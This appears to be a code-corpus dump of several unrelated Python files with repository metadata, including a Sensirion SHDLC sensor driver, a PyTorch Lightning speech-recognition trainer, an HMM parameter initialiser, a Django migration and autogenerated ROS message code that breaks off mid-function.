] | permissive | Sensirion/python-shdlc-driver | 052685da8db5629fa5929da65000210db82358e7 | 31e9683c27004ee05edf89996d656bc50f5bdb3a | refs/heads/master | 2021-06-10T10:35:47.299481 | 2021-03-19T08:47:12 | 2021-03-19T08:47:12 | 144,961,065 | 6 | 1 | null | null | null | null | UTF-8 | Python | false | false | 12,213 | py | # -*- coding: utf-8 -*-
# (c) Copyright 2019 Sensirion AG, Switzerland
from __future__ import absolute_import, division, print_function
from .device_base import ShdlcDeviceBase
from .commands.device_info import ShdlcCmdGetProductType, \
ShdlcCmdGetProductName, ShdlcCmdGetArticleCode, ShdlcCmdGetSerialNumber, \
ShdlcCmdGetProductSubType
from .commands.device_version import ShdlcCmdGetVersion
from .commands.error_state import ShdlcCmdGetErrorState
from .commands.device_reset import ShdlcCmdDeviceReset
from .commands.slave_address import ShdlcCmdGetSlaveAddress, \
ShdlcCmdSetSlaveAddress
from .commands.baudrate import ShdlcCmdGetBaudrate, ShdlcCmdSetBaudrate
from .commands.reply_delay import ShdlcCmdGetReplyDelay, ShdlcCmdSetReplyDelay
from .commands.system_up_time import ShdlcCmdGetSystemUpTime
from .commands.factory_reset import ShdlcCmdFactoryReset
import logging
log = logging.getLogger(__name__)
class ShdlcDevice(ShdlcDeviceBase):
"""
Generic SHDLC device, providing only common SHDLC commands. This class is
intended only to communicate with devices which do not provide a
corresponding device driver (yet). With this class you can for example
read the serial number of a device even if no device specific driver
exists. But if there exists a device specific driver, you should always
use it instead of this driver.
This is a low-level driver which just provides all SHDLC commands as Python
methods. Typically, calling a method sends one SHDLC request to the device
and interprets its response. There is no higher level functionality
available, please look for other drivers if you need a higher level
interface.
There is no (or very few) caching functionality in this driver. For example
if you call
:py:meth:`~sensirion_shdlc_driver.device.ShdlcDevice.get_serial_number()`
100 times, it will send the command 100 times over the SHDLC interface to
the device. This makes the driver (nearly) stateless.
"""
def __init__(self, connection, slave_address):
"""
Create an SHDLC device instance on an SHDLC connection.
.. note:: This constructor does not communicate with the device, so
it's possible to instantiate an object even if the device is
not connected or powered yet.
:param ~sensirion_shdlc_driver.connection.ShdlcConnection connection:
The connection used for the communication.
:param byte slave_address:
The address of the device.
"""
super(ShdlcDevice, self).__init__(connection, slave_address)
def get_product_type(self, as_int=False):
"""
Get the product type. The product type (sometimes also called "device
type") can be used to detect what kind of SHDLC product is connected.
:param bool as_int: If ``True``, the product type is returned as an
integer, otherwise as a string of hexadecimal
digits (default).
:return: The product type as an integer or string of hexadecimal
digits.
:rtype: string/int
"""
product_type = self.execute(ShdlcCmdGetProductType())
if as_int:
product_type = int(product_type, 16)
return product_type
def get_product_subtype(self):
"""
Get the product subtype. Some product types exist in multiple slightly
different variants, this command allows to determine the exact variant
of the connected device. Sometimes this is called "device subtype".
.. note:: This command is not supported by every product type.
:return: The product subtype as a byte (the interpretation depends on
the connected product type).
:rtype: byte
"""
return self.execute(ShdlcCmdGetProductSubType())
def get_product_name(self):
"""
Get the product name of the device.
.. note:: This command is not supported by every product type.
:return: The product name as an ASCII string.
:rtype: string
"""
return self.execute(ShdlcCmdGetProductName())
def get_article_code(self):
"""
Get the article code of the device.
.. note:: This command is not supported by every product type.
:return: The article code as an ASCII string.
:rtype: string
"""
return self.execute(ShdlcCmdGetArticleCode())
def get_serial_number(self):
"""
Get the serial number of the device.
:return: The serial number as an ASCII string.
:rtype: string
"""
return self.execute(ShdlcCmdGetSerialNumber())
def get_version(self):
"""
Get the version of the device firmware, hardware and SHDLC protocol.
:return: The device version as a Version object.
:rtype: Version
"""
return self.execute(ShdlcCmdGetVersion())
def get_error_state(self, clear=True, as_exception=False):
"""
Get and optionally clear the device error state and the last error. The
state and error code interpretation depends on the connected device
type.
:param bool clear:
If ``True``, the error state on the device gets cleared.
:param bool as_exception:
If ``True``, the error state is returned as an
:py:class:`~sensirion_shdlc_driver.errors.ShdlcDeviceError`
object instead of a byte.
:return: The device state as a 32-bit unsigned integer containing all
error flags, and the last error which occurred on the device.
If ``as_exception`` is ``True``, it's returned as an
:py:class:`~sensirion_shdlc_driver.errors.ShdlcDeviceError`
object or ``None``, otherwise as a byte.
:rtype: int, byte/ShdlcDeviceError/None
"""
state, error = self.execute(ShdlcCmdGetErrorState(clear=clear))
if as_exception:
error = self._get_device_error(error)
return state, error
def get_slave_address(self):
"""
Get the SHDLC slave address of the device.
.. note:: See also the property
:py:attr:`~sensirion_shdlc_driver.device.ShdlcDevice.slave_address`
which returns the device's slave address without sending a
command. This method really sends a command to the device,
even though the slave address is actually already known by
this object.
:return: The slave address of the device.
:rtype: byte
"""
return self.execute(ShdlcCmdGetSlaveAddress())
def set_slave_address(self, slave_address, update_driver=True):
"""
Set the SHDLC slave address of the device.
.. note:: The slave address is stored in non-volatile memory of the
device and thus persists after a device reset. So the next
time connecting to the device, you have to use the new
address.
.. warning:: When changing the address of a slave, make sure there
isn't already a slave with that address on the same bus!
In that case you would get communication issues which can
only be fixed by disconnecting one of the slaves.
:param byte slave_address:
The new slave address [0..254]. The address 255 is reserved for
broadcasts.
:param bool update_driver:
If ``True``, the property
:py:attr:`~sensirion_shdlc_driver.device.ShdlcDevice.slave_address`
of this object is also updated with the new address. This is
needed to allow further communication with the device, as its
address has changed.
"""
self.execute(ShdlcCmdSetSlaveAddress(slave_address))
if update_driver:
self._slave_address = slave_address
def get_baudrate(self):
"""
Get the SHDLC baudrate of the device.
.. note:: This method really sends a command to the device, even though
the baudrate is already known by the used
:py:class:`~sensirion_shdlc_driver.port.ShdlcPort` object.
:return: The baudrate of the device [bit/s].
:rtype: int
"""
return self.execute(ShdlcCmdGetBaudrate())
def set_baudrate(self, baudrate, update_driver=True):
"""
Set the SHDLC baudrate of the device.
.. note:: The baudrate is stored in non-volatile memory of the
device and thus persists after a device reset. So the next
time connecting to the device, you have to use the new
baudrate.
.. warning:: If you pass ``True`` to the argument ``update_driver``,
the baudrate of the underlaying
:py:class:`~sensirion_shdlc_driver.port.ShdlcPort` object
is changed. As the baudrate applies to the whole bus (with
all its slaves), you might no longer be able to
communicate with other slaves. Generally you should change
the baudrate of all slaves consecutively, and only set
``update_driver`` to ``True`` the last time.
:param int baudrate:
The new baudrate. See device documentation for a list of supported
baudrates. Many devices support the baudrates 9600, 19200 and
115200.
:param bool update_driver:
If true, the baudrate of the
:py:class:`~sensirion_shdlc_driver.port.ShdlcPort` object is also
updated with the baudrate. This is needed to allow further
communication with the device, as its baudrate has changed.
"""
self.execute(ShdlcCmdSetBaudrate(baudrate))
if update_driver:
self._connection.port.bitrate = baudrate
def get_reply_delay(self):
"""
Get the SHDLC reply delay of the device.
See
:py:meth:`~sensirion_shdlc_driver.device.ShdlcDevice.set_reply_delay()`
for details.
:return: The reply delay of the device [μs].
:rtype: byte
"""
return self.execute(ShdlcCmdGetReplyDelay())
def set_reply_delay(self, reply_delay):
"""
Set the SHDLC reply delay of the device.
The reply delay allows to increase the minimum response time of the
slave to a given value in Microseconds. This is needed for RS485
masters which require some time to switch from sending to receiving.
If the slave starts sending the response while the master is still
driving the bus lines, a conflict on the bus occurs and communication
fails. If you use such a slow RS485 master, you can increase the reply
delay of all slaves to avoid this issue.
:param byte reply_delay: The new reply delay [μs].
"""
self.execute(ShdlcCmdSetReplyDelay(reply_delay))
def get_system_up_time(self):
"""
Get the system up time of the device.
:return: The time since the last power-on or device reset [s].
:rtype: int
"""
return self.execute(ShdlcCmdGetSystemUpTime())
def device_reset(self):
"""
Execute a device reset (reboot firmware, similar to power cycle).
"""
self.execute(ShdlcCmdDeviceReset())
def factory_reset(self):
"""
Perform a factory reset (restore the off-the-shelf factory
configuration).
.. warning:: This resets any configuration done after leaving the
factory! Keep in mind that this command might also change
communication parameters (i.e. baudrate and slave address)
and thus you might have to adjust the driver's parameters
to allow further communication with the device.
"""
self.execute(ShdlcCmdFactoryReset())
| [
"urban.bruhin@sensirion.com"
] | urban.bruhin@sensirion.com |
669c553556fcd1474367708fd07b8c0349995ccb | 6343f0081768a991fc5f55e85d8cbddfb9cd3eaa | /Gallows/venv/Scripts/pip3-script.py | 90f5f2f48ef520827b49dc65fa6816310bbe8aca | [] | no_license | EXALLENGE/Belous_task_2 | a3ef2cfd65c23d6c066d2f11105c2c143e6a8723 | 06c9a6263656c6525af4ca21d0e923389fa977bb | refs/heads/master | 2020-04-23T23:13:45.677818 | 2019-02-20T15:35:35 | 2019-02-20T15:35:35 | 171,528,666 | 0 | 0 | null | null | null | null | WINDOWS-1251 | Python | false | false | 425 | py | #!C:\Users\Миша\PycharmProjects\Belous_task_2\venv\Scripts\python.exe -x
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==10.0.1','console_scripts','pip3'
__requires__ = 'pip==10.0.1'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==10.0.1', 'console_scripts', 'pip3')()
)
| [
"mike.belous@gmail.com"
] | mike.belous@gmail.com |
76dfc65104ff5fc6446594836bf678bf7c297bbc | 93164624d55f22b7da35f993bfbfcdd615495f6c | /platobot/platobot/bin/workers_dispatcher.py | 3f2ad1f6efd9314e98ec58265e6fedaaa9a1bc3e | [] | no_license | Opportunity-Hack-San-Jose-2017/Team7 | 315b4aa7697d9267d5d62ce30312c257f2f1b0ae | f06c07c7b25e76d1f8dbd8d4dcab3b038bb2f84b | refs/heads/master | 2021-10-11T07:15:12.402531 | 2019-01-23T05:26:30 | 2019-01-23T05:26:30 | 108,605,849 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 129 | py | from platobot.workers.manager import Manager
if __name__ == "__main__":
manager = Manager(1, 'Chatty')
manager.start()
| [
"yijoydai@gmail.com"
] | yijoydai@gmail.com |
f984d94c574fa9dc474db91ff900636f282e36bb | 5b9a5dc92ac4eef05e4d9cae7a29c2c88f2a1a64 | /backend/users/migrations/0003_auto_20190616_0937.py | 9998585206e807df9ba125565f7651e077094df7 | [] | no_license | yawnlon/Xueqing | be8ba0c28e0e5359a74ffa33b620d9fd1cf018e6 | cbbf9e23569744a32d6f35c6f8a8e65136836e80 | refs/heads/master | 2023-07-05T16:15:19.098910 | 2021-08-27T02:32:50 | 2021-08-27T02:32:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 490 | py | # Generated by Django 2.2.1 on 2019-06-16 09:37
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('users', '0002_smscode'),
]
operations = [
migrations.AlterField(
model_name='smscode',
name='mobile',
field=models.CharField(error_messages={'unique': 'A user with that mobile number already exists.'}, max_length=11, unique=True, verbose_name='手机号'),
),
]
| [
"wuboyangyawn@hotmail.com"
] | wuboyangyawn@hotmail.com |
e307d6950e0d0a9b0ad0b5918da3c94c91bd5e50 | 557d52dfb2116f453483d1ecdae0e3410683f75a | /swappy/src/swap/investors/migrations/0001_initial.py | 737322bc2868cec27df987c61c1c4993e119066d | [] | no_license | scvalencia/swap | 30ac975e8dc82da20ac4433f36ddec6d129e5f08 | 40d1817f2ed8b32c9318fad44d6fde36447ae0e6 | refs/heads/master | 2020-04-06T08:10:23.812831 | 2014-12-22T05:52:06 | 2014-12-22T05:52:06 | 24,610,170 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 788 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
]
operations = [
migrations.CreateModel(
name='Follow',
fields=[
],
options={
'unique_together': set([('follower_login', 'following_login')]),
'db_table': 'follows',
'managed': False,
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Investor',
fields=[
],
options={
'db_table': 'investors',
'managed': False,
},
bases=(models.Model,),
),
]
| [
"jcbages@outlook.com"
] | jcbages@outlook.com |
d3d8c71c3ff21b36b1fd9039631553b991a09fbd | 2117f0fc0005957b5b9a8eead9e17bbec5edd02e | /shortbot.py | 1a4c5a512db992c12a67b949155c13d2f07dd6b3 | [] | no_license | tim35050/shortbot | 44cdc2fd39ea402aaf38543e8635c7e0e08b0476 | 30c292814589c63779423818172bacb3e451cafb | refs/heads/master | 2021-01-18T05:06:06.483252 | 2013-12-13T06:38:58 | 2013-12-13T06:38:58 | 15,033,799 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,410 | py | # -*- coding: utf-8 -*-
# <nbformat>3.0</nbformat>
# <codecell>
print "hello"
# <codecell>
import re
import random
#from nltk import compat
class Chat(object):
def __init__(self, pairs, reflections={}):
"""
Initialize the chatbot. Pairs is a list of patterns and responses. Each
pattern is a regular expression matching the user's statement or question,
e.g. r'I like (.*)'. For each such pattern a list of possible responses
is given, e.g. ['Why do you like %1', 'Did you ever dislike %1']. Material
which is matched by parenthesized sections of the patterns (e.g. .*) is mapped to
the numbered positions in the responses, e.g. %1.
:type pairs: list of tuple
:param pairs: The patterns and responses
:type reflections: dict
:param reflections: A mapping between first and second person expressions
:rtype: None
"""
self._pairs = [(re.compile(x, re.IGNORECASE),y) for (x,y) in pairs]
#self._topics = topics
self._reflections = reflections
self._regex = self._compile_reflections()
def _compile_reflections(self):
sorted_refl = sorted(self._reflections.keys(), key=len,
reverse=True)
return re.compile(r"\b({0})\b".format("|".join(map(re.escape,
sorted_refl))), re.IGNORECASE)
def _substitute(self, str):
"""
Substitute words in the string, according to the specified reflections,
e.g. "I'm" -> "you are"
:type str: str
:param str: The string to be mapped
:rtype: str
"""
#print str
return self._regex.sub(lambda mo:
self._reflections[mo.string[mo.start():mo.end()]],
str.lower())
def _wildcards(self, response, match):
pos = response.find('%')
while pos >= 0:
num = int(response[pos+1:pos+2])
replacement = self._substitute(match.group(num))
print "response:",self._substitute(match.group(num))
response = response[:pos] + \
replacement + \
response[pos+2:]
pos = response.find('%')
return response
def respond(self, str):
"""
Generate a response to the user input.
:type str: str
:param str: The string to be mapped
:rtype: str
"""
# check each pattern
for (pattern, response) in self._pairs:
match = pattern.match(str)
# did the pattern match?
if match:
resp = random.choice(response) # pick a random response
resp = self._wildcards(resp, match) # process wildcards
# fix munged punctuation at the end
if resp[-2:] == '?.': resp = resp[:-2] + '.'
if resp[-2:] == '??': resp = resp[:-2] + '?'
return resp
# Hold a conversation with a chatbot
def converse(self, quit="quit"):
input = ""
while input != quit:
input = quit
try: input = raw_input(">")
except EOFError:
print(input)
if input:
while input[-1] in "!.": input = input[:-1]
print(self.respond(input))
# <codecell>
reflections = {
"i am" : "you are",
"i was" : "you were",
"i" : "you",
"i'm" : "you are",
"i'd" : "you would",
"i've" : "you have",
"i'll" : "you will",
"my" : "your",
"you are" : "I am",
"you were" : "I was",
"you've" : "I have",
"you'll" : "I will",
"your" : "my",
"yours" : "mine",
"you" : "me",
"me" : "you"
}
pairs = (
# suggestions
(r'Hello.*',
( "Hey what's up??Which URL can i shorten for u?",
"Need help with URL shortening?")),
(r".*(http://.*)",
( "URL you have entered is %1",
"I don't know your short URL")),
# anything else
(r'(.*)',
( "(Looking soulfully) treat please...",
"Did you say 'Let's go for a walk?'",
"Yes! Yes! Nap time!",
)
)
)
if __name__ == "__main__":
print "Hi..I am your shortbot."
print "Please enter the URL in the form of http://UrlToBeShortened"
short = Chat(pairs, reflections)
short.converse()
# <codecell>
| [
"siddhartha@berkeley.edu"
] | siddhartha@berkeley.edu |
572f08f2106e213faddc56d75d42ca523cc209fe | c7b3f765302d4737ae8bc6e3973bce900d0a93cd | /speechrecognition/neuralnet/train.py | 114bfce52e4cd09b2cceb92b610dc1db5f94447b | [
"Apache-2.0"
] | permissive | rishiraj/heychinki | 0033fc0d1ba92e325244216bc986d332b3d497c3 | 413e8fbf2b7b4b1c041575ab17a43b12bade4b00 | refs/heads/main | 2023-08-23T10:36:52.050510 | 2021-10-08T20:58:06 | 2021-10-08T20:58:06 | 411,438,402 | 1 | 0 | Apache-2.0 | 2021-10-01T11:16:14 | 2021-09-28T21:05:54 | Python | UTF-8 | Python | false | false | 7,087 | py | import os
import ast
import torch
import torch.nn as nn
from torch.nn import functional as F
import torch.optim as optim
from torch.utils.data import DataLoader
from pytorch_lightning.core.lightning import LightningModule
from pytorch_lightning import Trainer
from argparse import ArgumentParser
from model import SpeechRecognition
from dataset import Data, collate_fn_padd
from pytorch_lightning.loggers import TensorBoardLogger
from pytorch_lightning.callbacks import ModelCheckpoint
class SpeechModule(LightningModule):
def __init__(self, model, args):
super(SpeechModule, self).__init__()
self.model = model
self.criterion = nn.CTCLoss(blank=28, zero_infinity=True)
self.args = args
def forward(self, x, hidden):
return self.model(x, hidden)
def configure_optimizers(self):
self.optimizer = optim.AdamW(self.model.parameters(), self.args.learning_rate)
self.scheduler = optim.lr_scheduler.ReduceLROnPlateau(
self.optimizer, mode='min',
factor=0.50, patience=6)
return [self.optimizer], [self.scheduler]
def step(self, batch):
spectrograms, labels, input_lengths, label_lengths = batch
bs = spectrograms.shape[0]
hidden = self.model._init_hidden(bs)
hn, c0 = hidden[0].to(self.device), hidden[1].to(self.device)
output, _ = self(spectrograms, (hn, c0))
output = F.log_softmax(output, dim=2)
loss = self.criterion(output, labels, input_lengths, label_lengths)
return loss
def training_step(self, batch, batch_idx):
loss = self.step(batch)
logs = {'loss': loss, 'lr': self.optimizer.param_groups[0]['lr'] }
return {'loss': loss, 'log': logs}
def train_dataloader(self):
d_params = Data.parameters
d_params.update(self.args.dparams_override)
train_dataset = Data(json_path=self.args.train_file, **d_params)
return DataLoader(dataset=train_dataset,
batch_size=self.args.batch_size,
num_workers=self.args.data_workers,
pin_memory=True,
collate_fn=collate_fn_padd)
def validation_step(self, batch, batch_idx):
loss = self.step(batch)
return {'val_loss': loss}
def validation_epoch_end(self, outputs):
avg_loss = torch.stack([x['val_loss'] for x in outputs]).mean()
self.scheduler.step(avg_loss)
tensorboard_logs = {'val_loss': avg_loss}
return {'val_loss': avg_loss, 'log': tensorboard_logs}
def val_dataloader(self):
d_params = Data.parameters
d_params.update(self.args.dparams_override)
test_dataset = Data(json_path=self.args.valid_file, **d_params, valid=True)
return DataLoader(dataset=test_dataset,
batch_size=self.args.batch_size,
num_workers=self.args.data_workers,
collate_fn=collate_fn_padd,
pin_memory=True)
def checkpoint_callback(args):
return ModelCheckpoint(
filepath=args.save_model_path,
save_top_k=True,
verbose=True,
monitor='val_loss',
mode='min',
prefix=''
)
def main(args):
h_params = SpeechRecognition.hyper_parameters
h_params.update(args.hparams_override)
model = SpeechRecognition(**h_params)
if args.load_model_from:
speech_module = SpeechModule.load_from_checkpoint(args.load_model_from, model=model, args=args)
else:
speech_module = SpeechModule(model, args)
logger = TensorBoardLogger(args.logdir, name='speech_recognition')
trainer = Trainer(logger=logger)
trainer = Trainer(
max_epochs=args.epochs, gpus=args.gpus,
num_nodes=args.nodes, distributed_backend=None,
logger=logger, gradient_clip_val=1.0,
val_check_interval=args.valid_every,
checkpoint_callback=checkpoint_callback(args),
resume_from_checkpoint=args.resume_from_checkpoint
)
trainer.fit(speech_module)
if __name__ == "__main__":
parser = ArgumentParser()
# distributed training setup
parser.add_argument('-n', '--nodes', default=1, type=int, help='number of data loading workers')
parser.add_argument('-g', '--gpus', default=1, type=int, help='number of gpus per node')
parser.add_argument('-w', '--data_workers', default=0, type=int,
help='n data loading workers, default 0 = main process only')
parser.add_argument('-db', '--dist_backend', default='ddp', type=str,
help='which distributed backend to use. defaul ddp')
# train and valid
parser.add_argument('--train_file', default=None, required=True, type=str,
help='json file to load training data')
parser.add_argument('--valid_file', default=None, required=True, type=str,
help='json file to load testing data')
parser.add_argument('--valid_every', default=1000, required=False, type=int,
help='valid after every N iteration')
# dir and path for models and logs
parser.add_argument('--save_model_path', default=None, required=True, type=str,
help='path to save model')
parser.add_argument('--load_model_from', default=None, required=False, type=str,
help='path to load a pretrain model to continue training')
parser.add_argument('--resume_from_checkpoint', default=None, required=False, type=str,
help='check path to resume from')
parser.add_argument('--logdir', default='tb_logs', required=False, type=str,
help='path to save logs')
# general
parser.add_argument('--epochs', default=10, type=int, help='number of total epochs to run')
parser.add_argument('--batch_size', default=64, type=int, help='size of batch')
parser.add_argument('--learning_rate', default=1e-3, type=float, help='learning rate')
parser.add_argument('--pct_start', default=0.3, type=float, help='percentage of growth phase in one cycle')
parser.add_argument('--div_factor', default=100, type=int, help='div factor for one cycle')
parser.add_argument("--hparams_override", default="{}", type=str, required=False,
help='override the hyper parameters, should be in form of dict. ie. {"attention_layers": 16 }')
parser.add_argument("--dparams_override", default="{}", type=str, required=False,
help='override the data parameters, should be in form of dict. ie. {"sample_rate": 8000 }')
args = parser.parse_args()
args.hparams_override = ast.literal_eval(args.hparams_override)
args.dparams_override = ast.literal_eval(args.dparams_override)
if args.save_model_path:
if not os.path.isdir(os.path.dirname(args.save_model_path)):
raise Exception("the directory for path {} does not exist".format(args.save_model_path))
main(args) | [
"noreply@github.com"
] | rishiraj.noreply@github.com |
cfb080d14c05e5ba70f3611fba5c7802c11373c9 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02882/s256412363.py | 88b565ca18c9c84c582fb7237d25bd5927bd6b85 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 166 | py | from math import atan,pi
a,b,x=map(int,input().split())
if b-x/a**2 <= x/a**2:print(atan((b-x/a**2)/(a/2))*(180/pi))
else:
y = x/a*2/b
print(atan(b/y)*(180/pi)) | [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
2fddf29e1c4233369a16715c73ac161b2fbe1826 | 6b13e840d579000a623ab2f5d7463e4cefb18f2d | /initialisation.py | 54ba32bdee035ac8adf1c6b4ed01ac49b0bf4efa | [
"MIT"
] | permissive | RomainSabathe/cw_hmm_expectation_maximization | efd0bdc36acc230aced42c89f9ac7e467ee4d341 | 0822282f05607e8e0e500c039e1b6f7e7a642258 | refs/heads/master | 2021-01-01T05:16:16.943303 | 2016-05-13T19:16:51 | 2016-05-13T19:16:51 | 58,765,060 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,208 | py | import numpy as np
from tools import *
def initialise_parameters(K, N, model='multinomial'):
"""
Initialise parameters (A, B, pi) for a EM of HMM.
K: the number of states the hidden variables can take
N: the number of states the visible variables can take.
model: whether 'multinomial' or 'normal'
"""
A = initialise_A(K)
pi = initialise_pi(K)
if model == 'multinomial':
B = initialise_B(K, N)
return A, B, pi
elif model == 'normal':
E = {}
E['mu'] = np.random.rand(K)
E['sigma2'] = np.random.rand(K)
return A, E, pi
else:
raise Exception('Model unknown')
def initialise_A(K):
"""
See 'initialise_parameters' for usage.
Remainder: A is the transition matrix for the latent variables.
A[i,j] = p(z_t = j | z_t-1 = i)
K: the number of states the hidden variables can take
"""
A = np.matrix(np.zeros([K, K]))
for i in range(K):
A[i,:] = np.random.rand(K)
A[i,:] = normalise(A[i,:]) # the lines must sum to 1 (probability of
# getting *somewhere* starting from i)
return A
def initialise_B(K, N):
"""
See 'initialise_parameters' for usage.
Remainder: B is the estimated posterior probability at time t.
B[i, j] = p(x_t = j | z_t = i)
K: the number of states the hidden variables can take
N: the number of states the visible variables can take
"""
B = np.matrix(np.zeros([K, N]))
for i in range(K):
B[i,:] = np.random.rand(N)
B[i,:] = normalise(B[i,:]) # the lines must sum to 1 (probability of
# observing a visible state if the latent
# variable is i)
return B
def initialise_pi(K):
"""
See 'initialise_parameters' for usage.
Remainder: pi: the initial state distribution. pi(j) = p(z_(t=1) = j)
pi is a column vector.
K: the number of states the hidden variables can take
"""
pi = np.matrix(np.zeros([1, K]))
pi[0,:] = np.random.rand(K)
pi[0,:] = normalise(pi[0,:])
pi = pi.T # is now a column vector
return pi
| [
"RSabathe@gmail.com"
] | RSabathe@gmail.com |
e99a386905b70424a8de735bdb86b29c0631b254 | d4e573e8eae32db155fe5931b3e2dcd3aa48969b | /indigo/lib/python2.7/dist-packages/rocon_std_msgs/srv/_GetPlatformInfo.py | 9632cf90da8b4370fa3f61a096c961f655bcb6dd | [] | no_license | javierdiazp/myros | ee52b0a7c972d559a1a377f8de4eb37878b8a99b | 7571febdfa881872cae6378bf7266deca7901529 | refs/heads/master | 2022-11-09T09:24:47.708988 | 2016-11-10T16:56:28 | 2016-11-10T16:56:28 | 73,733,895 | 0 | 1 | null | 2022-10-25T05:16:35 | 2016-11-14T18:19:06 | C++ | UTF-8 | Python | false | false | 13,022 | py | # This Python file uses the following encoding: utf-8
"""autogenerated by genpy from rocon_std_msgs/GetPlatformInfoRequest.msg. Do not edit."""
import sys
python3 = True if sys.hexversion > 0x03000000 else False
import genpy
import struct
class GetPlatformInfoRequest(genpy.Message):
_md5sum = "d41d8cd98f00b204e9800998ecf8427e"
_type = "rocon_std_msgs/GetPlatformInfoRequest"
_has_header = False #flag to mark the presence of a Header object
_full_text = """"""
__slots__ = []
_slot_types = []
def __init__(self, *args, **kwds):
"""
Constructor. Any message fields that are implicitly/explicitly
set to None will be assigned a default value. The recommend
use is keyword arguments as this is more robust to future message
changes. You cannot mix in-order arguments and keyword arguments.
The available fields are:
:param args: complete set of field values, in .msg order
:param kwds: use keyword arguments corresponding to message field names
to set specific fields.
"""
if args or kwds:
super(GetPlatformInfoRequest, self).__init__(*args, **kwds)
def _get_types(self):
"""
internal API method
"""
return self._slot_types
def serialize(self, buff):
"""
serialize message into buffer
:param buff: buffer, ``StringIO``
"""
try:
pass
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize(self, str):
"""
unpack serialized message in str into this message instance
:param str: byte array of serialized message, ``str``
"""
try:
end = 0
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
def serialize_numpy(self, buff, numpy):
"""
serialize message with numpy array types into buffer
:param buff: buffer, ``StringIO``
:param numpy: numpy python module
"""
try:
pass
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize_numpy(self, str, numpy):
"""
unpack serialized message in str into this message instance using numpy for array types
:param str: byte array of serialized message, ``str``
:param numpy: numpy python module
"""
try:
end = 0
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
_struct_I = genpy.struct_I
# This Python file uses the following encoding: utf-8
"""autogenerated by genpy from rocon_std_msgs/GetPlatformInfoResponse.msg. Do not edit."""
import sys
python3 = True if sys.hexversion > 0x03000000 else False
import genpy
import struct
import rocon_std_msgs.msg
class GetPlatformInfoResponse(genpy.Message):
_md5sum = "b7b34c89d857c757ff89bd8e49fa695f"
_type = "rocon_std_msgs/GetPlatformInfoResponse"
_has_header = False #flag to mark the presence of a Header object
_full_text = """PlatformInfo platform_info
================================================================================
MSG: rocon_std_msgs/PlatformInfo
# Provides platform details for robots, software or human
# interactive devices.
########################### Variables ###########################
# rocon universal resource identifier
string uri
# rocon version compatibility identifier (used when connecting to concerts)
string version
Icon icon
================================================================================
MSG: rocon_std_msgs/Icon
# Used to idenfity the original package/filename resource this icon was/is to be loaded from
# This typically doesn't have to be set, but can be very useful when loading icons from yaml definitions.
string resource_name
# Image data format. "jpeg" or "png"
string format
# Image data.
uint8[] data"""
__slots__ = ['platform_info']
_slot_types = ['rocon_std_msgs/PlatformInfo']
def __init__(self, *args, **kwds):
"""
Constructor. Any message fields that are implicitly/explicitly
set to None will be assigned a default value. The recommend
use is keyword arguments as this is more robust to future message
changes. You cannot mix in-order arguments and keyword arguments.
The available fields are:
platform_info
:param args: complete set of field values, in .msg order
:param kwds: use keyword arguments corresponding to message field names
to set specific fields.
"""
if args or kwds:
super(GetPlatformInfoResponse, self).__init__(*args, **kwds)
#message fields cannot be None, assign default values for those that are
if self.platform_info is None:
self.platform_info = rocon_std_msgs.msg.PlatformInfo()
else:
self.platform_info = rocon_std_msgs.msg.PlatformInfo()
def _get_types(self):
"""
internal API method
"""
return self._slot_types
def serialize(self, buff):
"""
serialize message into buffer
:param buff: buffer, ``StringIO``
"""
try:
_x = self.platform_info.uri
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
if python3:
buff.write(struct.pack('<I%sB'%length, length, *_x))
else:
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self.platform_info.version
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
if python3:
buff.write(struct.pack('<I%sB'%length, length, *_x))
else:
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self.platform_info.icon.resource_name
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
if python3:
buff.write(struct.pack('<I%sB'%length, length, *_x))
else:
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self.platform_info.icon.format
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
if python3:
buff.write(struct.pack('<I%sB'%length, length, *_x))
else:
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self.platform_info.icon.data
length = len(_x)
# - if encoded as a list instead, serialize as bytes instead of string
if type(_x) in [list, tuple]:
buff.write(struct.pack('<I%sB'%length, length, *_x))
else:
buff.write(struct.pack('<I%ss'%length, length, _x))
